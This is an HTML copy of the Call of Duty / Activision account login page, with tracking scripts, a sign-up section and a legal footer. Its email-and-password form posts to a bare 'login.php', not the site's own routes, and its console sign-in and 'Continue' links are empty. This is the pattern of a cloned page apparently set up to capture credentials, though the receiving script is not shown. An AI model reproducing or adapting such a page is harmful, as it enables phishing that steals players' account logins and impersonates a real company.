







<!DOCTYPE html>
<html lang="en"> 
	<head>
		<meta name="description" content="Activision login page" />
	
		<script> var dataLayer = dataLayer || [];</script>
		<script id="gtm-script" src="/resources/common/scripts/gtmLayer.js?v="></script>
	
		<!-- Google Tag Manager -->
		<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
		new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
		j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
		'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
		})(window,document,'script','dataLayer','GTM-T6X8245');</script>
		<!-- End Google Tag Manager -->

		<title>Log in - CALL OF DUTY®</title>
		
		<!-- TAG MANAGER -->
				
		
			
				<script src="//assets.adobedtm.com/launch-EN5168b2ad8b9642288f63960a65d05d3c.min.js"></script>
			
			
			
		
		
		<script src="/resources/common/scripts/font-loader.js"></script>
		
		<meta charset="UTF-8" />
		<meta http-equiv="x-ua-compatible" content="ie=edge" />
		
		<meta name="keywords" content="login, activision" />
		<meta name="sitename" content="cod"/>
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<link rel="shortcut icon" type="image/x-icon" href="/resources/cod/images/favicon.ico" />
		<link rel="icon" type="image/x-icon" href="/resources/cod/images/favicon.ico" />
		<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
		<meta http-equiv="Pragma" content="no-cache" />
		<meta http-equiv="Expires" content="0" />
		
		
		
		
		
		
			<script src="https://www.google.com/recaptcha/api.js?hl=en" async defer></script>
		
		
		







<meta name="_csrf" content="j249oRMxvFX9aSQzyc1Jvhzbrn5-utPOBvNnzq1xr_McSlvCsyeNXX6KTzZUs9yb"/>
<meta name="_csrf_header" content="X-XSRF-TOKEN"/>


<link href="https://fonts.googleapis.com/css?family=Abel" rel="stylesheet"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans+Condensed:300,700%7COpen+Sans:300,400,700&amp;subset=latin,latin,latin" media="all">
<meta property="og:image" content="/resources/cod/images/shared-logo.jpg" />

<link rel="stylesheet" href="/resources/common/styles/preload.css?v=" />





<!--  Modernizr needs to be loaded in head as otherwise it can't use the html5shiv for IE -->
<script src="/resources/common/scripts/modernizr-1.7.min.js"></script>






	
		<link rel="stylesheet" href="/resources/common/styles/common-site-updated.css?v=1618126976346" />
	
	


<link rel="stylesheet" href="/resources/common/styles/sso-media-queries.css?v=1618126976346" />
<link rel="stylesheet" href="/resources/common/styles/responsive-site.css?v=1618126976346" />

<link rel="stylesheet" href="/resources/cod/styles/sso-site-specific.css?v=1618126976346" />
<link rel="stylesheet" href="/resources/cod/styles/site.css?v=1618126976346" />


	
	
		
	


		
	<script>bazadebezolkohpepadr="1424519537"</script><script type="text/javascript" src="https://profile.callofduty.com/akam/11/54e870b3" defer></script></head>
	
	
		<body class="login-page noscript sso locale-en ">
	
		<div id="cdo-bar">
			
		</div>
	
		






<div class="account-linking-error-container">
	<div class="background">
		<div class="psn">
			<p>Please click the following link to complete your Playstation Account.</p>
			<a href="https://account.sonyentertainmentnetwork.com/" target="_blank">Playstation Account Link</a>
			<p>Once you have completed your account, click the following link to proceed.</p>
			<a href="">Continue</a>
		</div>
		<div class="xbl">
			<p>Please click the following link to complete your XBOX Live Account.</p>
			<a href="https://account.xbox.com/" target="_blank">XBOX Account Link</a>
			<p>Once you have completed your account, click the following link to proceed.</p>
			<a href="">Continue</a>
		</div>
		<div class="generic">
			<p>Previous action failed. Please try again.</p>
			<a class="close-overlay" href="">Close this Overlay</a>
		</div>
	</div>
</div>
		
        
        








	<!-- wrapper div:  ID with the page name -->
	<div id="login" class="wrapper SSO SSO-PAGE center ">

		<header>
			<div class="masthead">
				<h1 class="logo">
					CALL OF DUTY®
				</h1>
				<ul class="clearfix" id="breadcrumb">
					<li id="breadcrumb-home">
						<a href="http://www.callofduty.com">Home</a>
					</li>
					<li>
						Call of Duty: 
						<span class="page-name">Log in</span>
					</li>
				</ul>
				<ul class="masthead-logos-container">
					
				</ul>
			</div>
		</header>

		<article>
			<section class="clearfix">
				<h3><div class="pre-cod-logo">Join the World of</div><span class="cod-logo" role="img" aria-label="Call of Duty">Call of Duty</span></h3>
				<div class="cod-login-step1"><p><span class="corners left"></span>Log in Via Your Network<span class="corners right"></span></p></div>
								
				
				
				
				<form id="frmLogin" name="frmLogin" class="horz-label clearfix" action="login.php" method="post">
					<fieldset id="login-info" class="sso-form-input-block">
						

						<h6>
							Sign in to your Call of Duty account 
						</h6>
						
						




	
	
	<div class="data-row clearfix" id="email-data-row">
		<label for="username">Email Address:</label>
		<div class="input-container clearfix">
			<input type="email" id='username' name='username' autocomplete="on" placeholder="" 
				value='' required aria-describedby="email-error"/>	
		</div>
		<span class="sprite-pages feedback-control icon"></span>
		<div id="email-error" class="feedback-control message">Please enter your email address</div>	
	</div>	
	<div class="data-row clearfix" id="remember-me-div">
		<div class="input-container clearfix">
			<input type="checkbox" id="remember-me-checkbox" class="atvi-instrument atvi-instrument-checkbox" name="remember_me" value="true" checked="checked" />
			<label for="remember-me-checkbox" class="custom-checkbox" style="display:none;"></label>
		</div>
		<label for="remember-me-checkbox">Remember me</label>
	</div>					
	<div class="data-row clearfix" id="password-data-row">	    	
		<label for="password">Password:</label>
		<div class="input-container clearfix">
			<input type='password' id='password' name='password' autocomplete="on" placeholder="" required aria-describedby="password-error"/>
			<span class="visibility-toggle" tabindex="0"></span>
		</div>
		<span class="sprite-pages feedback-control icon"></span>
		<div id="password-error" class="feedback-control message">Please enter a password</div>
	</div>
	
	<div class="actions clearfix">
		
	    <button id="login-button" class="submit large atvi-instrument atvi-instrument-button" type="submit">Sign In</button>
		<p class="no-login-text">New to Call of Duty?</p>
		<a href="/cod/register" title="Sign Up" id="login-need-account" class="atvi-instrument atvi-instrument-link">Sign Up</a>
	</div>
	<div class="login-forgot-password">
		<a href="/cod/forgotPassword" id="login-forgot-password" class="atvi-instrument atvi-instrument-link" title="Need Help?">Need Help?</a>
	</div>	
	<div id="login-center-content" class="center">
		
	</div>
					</fieldset>	
	    		<div>
<input type="hidden" name="_csrf" value="j249oRMxvFX9aSQzyc1Jvhzbrn5-utPOBvNnzq1xr_McSlvCsyeNXX6KTzZUs9yb" />
</div></form>
	    		
				
					






<p class="subheading">Select your network to get started</p>
<div id="console-login" class="network-select-container">
	<ul class="network-select console-login">
		<li class="psn">
			<a href="" class="psn-login-link" aria-label="Sign In Via Playstation"><span class="gaming-network-name">Sign In Via Playstation</span></a>
		</li>
		<li class="xbl">
			<a href="" class="xbl-login-link" aria-label="Sign In Via Xbox"><span class="gaming-network-name">Sign In Via Xbox</span></a>
		</li>
		<li class="nintendo">
			<a href="" class="nintendo-login-link" aria-label="Sign In Via Nintendo"><span class="gaming-network-name">Sign In Via Nintendo</span></a>
		</li>
		
			<li class="battle">
				<a href="" class="battle-login-link" aria-label="Sign In Via Battle.net"><span class="gaming-network-name">Sign In Via Battle.net</span></a>
			</li>
		
		
			<li class="steam">
				<a href="" class="steam-login-link" aria-label="Sign In Via Steam"><span class="gaming-network-name">Sign In Via Steam</span></a>
			</li>
		
		
	</ul>
</div>

					<div class="or"><p>OR</p></div>
				
	    		
				<div class="actions clearfix">
					<p class="no-login-text">New to Call of Duty?</p>
					<a href="/cod/register" title="Sign Up" id="login-need-account" class="atvi-instrument atvi-instrument-link">Sign Up</a>
				</div>
			</section>
			






<div class="clearfix registrationIncentives">
	<ul>
		<li class="regTile1">
			<div class="incentive-container">
				<h3>Enhance Your Game</h3><ul class="incentive-description"><li><span></span>Get your personalized live stats</li><li><span></span>See where you rank on the global leaderboard</li><li><span></span>Set your loadouts from the app or website</li></ul>
			</div>	
		</li>
		<li class="regTile2">
			<div class="incentive-container">
				<h3>Connect With Friends</h3><ul class="incentive-description"><li><span></span>Compare your stats to your friends</li><li><span></span>See your friend's achievements</li><li><span></span>Chat with other users on the forums</li></ul>
			</div>
		</li>
		<li class="regTile3">
			<div class="incentive-container">
				<h3>Get The Latest Intel</h3><ul class="incentive-description"><li><span></span>Your source for the most current news</li><li><span></span>Get alerts for new events or updates</li><li><span></span>Receive personalized match analysis and weekly recaps</li></ul>
			</div>
		</li>
	</ul>
</div>

			<!--  end col -->
		</article>
	</div><!--  end content -->
		

		<script>
			//Detect if JavaScript and cookies are enabled. Do this inline rather than waiting for onload/onready to avoid momentarily displaying no script error
			if (navigator.cookieEnabled) {
				document.body.className = document.body.className.replace("noscript", "hasscript");
			}
		</script>
		<div id="noscript-warning">JavaScript and cookies are required. Please enable them.</div>
		

		









 































<footer class="standard-footer"> <div class="footer-content clearfix"><ul id="additional-info"><li class="first"><a href="http://www.activision.com//legal" target="_blank" rel="nofollow">Legal</a></li><li><a href="http://www.activision.com//legal/terms-of-use" target="_blank" rel="nofollow">Terms of Use</a></li><li><a href="http://www.activision.com//legal/privacy-policy" target="_blank" rel="nofollow">Privacy Policy</a></li><li><a href="https://www.activision.com//legal/cookie-policy" target="_blank" rel="nofollow">Cookie Policy</a></li><li><!-- OneTrust Cookies Settings button start --><button id="ot-sdk-btn" class="ot-sdk-show-settings">Cookie Settings</button><!-- OneTrust Cookies Settings button end --></li><li><a href="https://www.activision.com//legal/online-safety-guide" target="_blank" rel="nofollow">Online Safety</a></li><li><a href="http://support.activision.com/pkb_Home?Call_of_Duty_WWII&uil=en_US" target="_blank">Support</a></li></ul><ul id="partners" class="clearfix"><li><a class="activision" href="http://www.activision.com" target="_blank" rel="nofollow" role="img" aria-label="Visit the Activision website">Activision</a></li><li><a class="esrb-privacy" href=" http://www.esrb.org/confirm/activision-confirmation.aspx" target="_blank" rel="nofollow" role="img" aria-label="Visit the ESRB Privacy Certified website">Visit the ESRB Privacy Certified website</a></li><li><a class="esrb-m" href="http://www.esrb.org/ratings/ratings_guide.jsp" target="_blank" rel="nofollow" role="img" aria-label="Visit the rating board website.  ESRB Mature 17+: Blood and Gore, Intense Violence, Strong Language, Suggestive Themes, Use of Drugs, In-game Purchases / Users Interact">ESRB Mature 17+: Blood and Gore, Intense Violence, Strong Language, Suggestive Themes, Use of Drugs, In-game Purchases / Users Interact</a><p class="esrb-text">ESRB Mature 17+: Blood and Gore, Intense Violence, Strong Language, Suggestive Themes, Use of Drugs, In-game Purchases / Users Interact</p></li></ul><div id="trademarks">&copy; 2021 Activision Publishing, Inc. ACTIVISION, CALL OF DUTY, MODERN WARFARE, CALL OF DUTY MODERN WARFARE, CALL OF DUTY BLACK OPS, CALL OF DUTY GHOSTS, CALL OF DUTY ADVANCED WARFARE, CALL OF DUTY INFINITE WARFARE, CALL OF DUTY WWII and the CALL OF DUTY WORLD LEAGUE Logo are trademarks of Activision Publishing, Inc. All other trademarks and trade names are property of their respective owners.<br /><br /></div></div></footer>

		
		










<script src="/resources/common/scripts/jquery-1.11.2.js"></script>





<script id="sso-bar-script" src="/resources/common/scripts/sso.bar.js?v=1618126976346"></script>
<script>

	var config = {
		containerId : 'cdo-bar',
		locale : 'en_US',
		communityId : 'cod',
		isSSOPage : true,
		layout : { 
			type : "hybrid"
		 }
	}
	
	/*
	var config = {
		containerId : 'cdo-bar',
		locale : 'en_US',
		communityId : 'cod',
		isSSOPage : true
	}
	  */
	if (config.communityId && config.communityId.match('ghosts-monster')) {
		config.layout = {type : "hidden"}; 
	}
	
	if (config.communityId && config.communityId.match('ghosts-monster-eu')) {
		config.layout = {type : "hidden"}; 
	}
	
	var ssobar = new SSO.Bar(config);
</script>

<script id="sso-bar-script" src="/resources/common/scripts/digitalData.js?v=1618126976346"></script>
<script src="/resources/common/scripts/head.js?v=1618126976346"></script>
<script src="/resources/common/scripts/qrcode.js?v=1618126976346"></script>
<script src="/resources/common/scripts/jquery.qrcode.js?v=1618126976346"></script>

	<script id ='common-script' src="/resources/common/scripts/site.js?v=1618126976346"></script>





<script id="signup-script" src="/resources/common/scripts/signup.js?v=1618126976346"></script>


<!-- Analytics script -->
<script id="analytics-script" src="/resources/common/scripts/atvi-analytics.js?v=1618126976346"></script>

		







		
		<!-- TAG MANAGER -->
		<script type="text/javascript">ssobar.onReady(_satellite.pageBottom);</script>
	<noscript><img src="https://profile.callofduty.com/akam/11/pixel_54e870b3?a=dD01MWVjNTVmYWU2ZmJkNTJkMDYwNTZkZTQxYWI1NWM5OGU1NTgxOTI4JmpzPW9mZg==" style="visibility: hidden; position: absolute; left: -999px; top: -999px;" /></noscript><script type="text/javascript" >var _cf = _cf || [];  _cf.push(['_setFsp', true]);  _cf.push(['_setBm', true]);  _cf.push(['_setAu', '/staticweb/ab9d6e22b4ati1911422075c14da62dc9']); </script><script type="text/javascript"  src="/staticweb/ab9d6e22b4ati1911422075c14da62dc9"></script></body>
	
	
</html>